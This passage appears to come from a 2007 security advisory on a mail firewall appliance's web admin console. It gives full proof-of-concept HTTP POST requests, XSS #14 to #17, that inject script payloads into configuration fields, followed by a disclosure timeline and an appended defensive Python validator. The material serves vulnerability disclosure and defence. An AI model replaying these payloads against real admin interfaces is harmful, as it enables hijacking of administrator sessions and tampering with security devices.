%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1 %5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0 &rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5 D.langTagId=2016402&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28% 27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=sync_rules_order&rows%5B 2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r 
ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5 D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D .attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=% 5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4% 5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId =2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B 5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone =5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D. 
attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1% 5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+ 3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5% 5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2 C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A 6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_ aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows %5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang TagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:56 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #14 ] :. 
POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1 %5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0 &rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5 D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2% 5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1 
&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D. langTagId=2016403&rows%5B2%5D.attrValue=%27%3E%3Cscript%3Ealert%28%27SIA %27%29%3C%2Fscript%3E&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3 %5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true &rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3% 5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr =%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B 4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_ intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows% 5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D .multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5 D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+ 1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2 C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+ 5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1 %2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010% 3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0& rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D. langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D. 
attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la ngTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:00 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #15 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= init&procId=164 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2842 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=24&rows%5B1%5D.attrName=sync_results_count&rows%5B1 %5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrVali 
dateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0 &rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5 D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=syn c_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2% 5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1 &rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=%27%3E%3Cscri pt%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.langTagId=2016403&r ows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.at trType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3 %5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true &rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3% 5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.at trType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr =%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B 4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTag Id=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_ intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows% 5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D .multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClo ne=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5 D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValid ate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+ 1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2 C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+ 5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORM ATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1 %2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010% 
3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0& rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D. langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_rout e_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D. attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&ro ws%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.la ngTagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:23:16 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #16 ] :. POST https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method =save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method =init&isMenuToggled=1 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 100 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRouti ngInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2CMailRoutingMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E dtype=INBOUND&input1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript% 3E&input2=&submitValue=Submit HTTP/1.0 200 OK Date: 
Mon, 19 Feb 2007 10:23:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #17 ] :. POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/mailIdsConfig.do?method=init&isMenuToggled =1&procId=90 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2237 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fmet hod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMe nu%2CMailIDSMenu%2CApplicationLevelMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=10&rows%5B0%5D.attrName=pass_monitor&rows%5B0%5D.attrType=5&rows% 5B0%5D.attrValidate=&rows%5B0%5D.attrValidateStr=&rows%5B0%5D.attrDepend s=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.a ttrValueStrClone=0&rows%5B0%5D.langTagId=2000006&rows%5B1%5D.attrName=en able_dos&rows%5B1%5D.attrType=5&rows%5B1%5D.attrValidate=&rows%5B1%5D.at trValidateStr=&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows %5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=0&rows%5B1%5D.lang 
TagId=2000008&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrType=2&ro ws%5B2%5D.attrValidate=%5B1-65535%5D&rows%5B2%5D.attrValidateStr=%5B1-65 535%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D. modifyable=true&rows%5B2%5D.attrValueStrClone=100&rows%5B2%5D.langTagId= 2001009&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29% 3C%2Fscript%3E&rows%5B3%5D.attrName=shm_spamcount&rows%5B3%5D.attrType=2 &rows%5B3%5D.attrValidate=%5B1-65535%5D&rows%5B3%5D.attrValidateStr=%5B1 -65535%5D&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3% 5D.modifyable=true&rows%5B3%5D.attrValueStrClone=100&rows%5B3%5D.langTag Id=2001010&rows%5B3%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27 %29%3C%2Fscript%3E&rows%5B4%5D.attrName=passcrackswitch&rows%5B4%5D.attr Type=5&rows%5B4%5D.attrValidate=&rows%5B4%5D.attrValidateStr=&rows%5B4%5 D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&r ows%5B4%5D.attrValueStrClone=0&rows%5B4%5D.langTagId=2004104&rows%5B5%5D .attrName=passcrackcount&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate =%5B1-100%5D&rows%5B5%5D.attrValidateStr=%5B1-100%5D&rows%5B5%5D.attrDep ends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5 D.attrValueStrClone=5&rows%5B5%5D.langTagId=2004105&rows%5B5%5D.attrValu eStr=%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscript%3E&rows%5B6%5D. attrName=passtimeout&rows%5B6%5D.attrType=2&rows%5B6%5D.attrValidate=%5B 1-3600%5D&rows%5B6%5D.attrValidateStr=%5B1-3600%5D&rows%5B6%5D.attrDepen ds=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D. attrValueStrClone=60&rows%5B6%5D.langTagId=2004106&rows%5B6%5D.attrValue Str=%27%3E%3Cscript%3Ealert%28%27SIA4%27%29%3C%2Fscript%3E&submitValue=S ubmit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:24:22 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ TIMELINE ] :. 
22/Mar/2007 - We published the advisory.
07/Mar/2007 - Second contact. Provider didn't answer.
27/Feb/2007 - First contact with provider.
19/Feb/2007 - Vulnerabilities found.
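
Added example (not part of the original advisory and not the product's code): a server-side check for a form body shaped like the XSS #17 request, where numeric settings arrive as rows[N].attrValueStr next to a client-sent attrValidate range. It assumes the server keeps its own range per attrName (SERVER_RANGES, a hypothetical table filled with the ranges that request shows) and ignores the client-sent copy; rejected values are HTML-escaped before being echoed.

```python
import html
import re
from urllib.parse import parse_qsl

# Hypothetical server-side table. The ranges are the ones the XSS #17
# request carries in attrValidate; a rule sent by the client is not trusted.
SERVER_RANGES = {
    "shm_timeout": (1, 65535),
    "shm_spamcount": (1, 65535),
    "passcrackcount": (1, 100),
    "passtimeout": (1, 3600),
}
ROW_FIELD = re.compile(r"^rows\[(\d+)\]\.(\w+)$")

# Constructed sample: a shortened body in the shape of the XSS #17 request.
SAMPLE_BODY = (
    "procId=10"
    "&rows%5B2%5D.attrName=shm_timeout&rows%5B2%5D.attrValidate=%5B1-65535%5D"
    "&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E"
    "&rows%5B5%5D.attrName=passcrackcount&rows%5B5%5D.attrValidate=%5B1-100%5D"
    "&rows%5B5%5D.attrValueStr=5"
    "&rows%5B6%5D.attrName=passtimeout&rows%5B6%5D.attrValueStr=99999"
    "&submitValue=Submit"
)

def parse_rows(body):
    """Group the rows[N].field pairs of a form-encoded body by row index."""
    rows = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = ROW_FIELD.match(key)
        if m:
            rows.setdefault(int(m.group(1)), {})[m.group(2)] = value
    return rows

def validate_rows(body):
    """Return (accepted, rejected); rejected values are escaped for display."""
    accepted, rejected = {}, {}
    for row in parse_rows(body).values():
        name = row.get("attrName", "")
        raw = row.get("attrValueStr", "")
        bounds = SERVER_RANGES.get(name)
        ok = bounds and re.fullmatch(r"[0-9]{1,5}", raw) and bounds[0] <= int(raw) <= bounds[1]
        if ok:
            accepted[name] = int(raw)
        else:
            # quote=True also encodes ' and ", the characters that close an attribute
            rejected[html.escape(name, quote=True)] = html.escape(raw, quote=True)
    return accepted, rejected
```

Calling validate_rows(SAMPLE_BODY) accepts only passcrackcount; the script payload and the out-of-range passtimeout both land in the rejected map.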

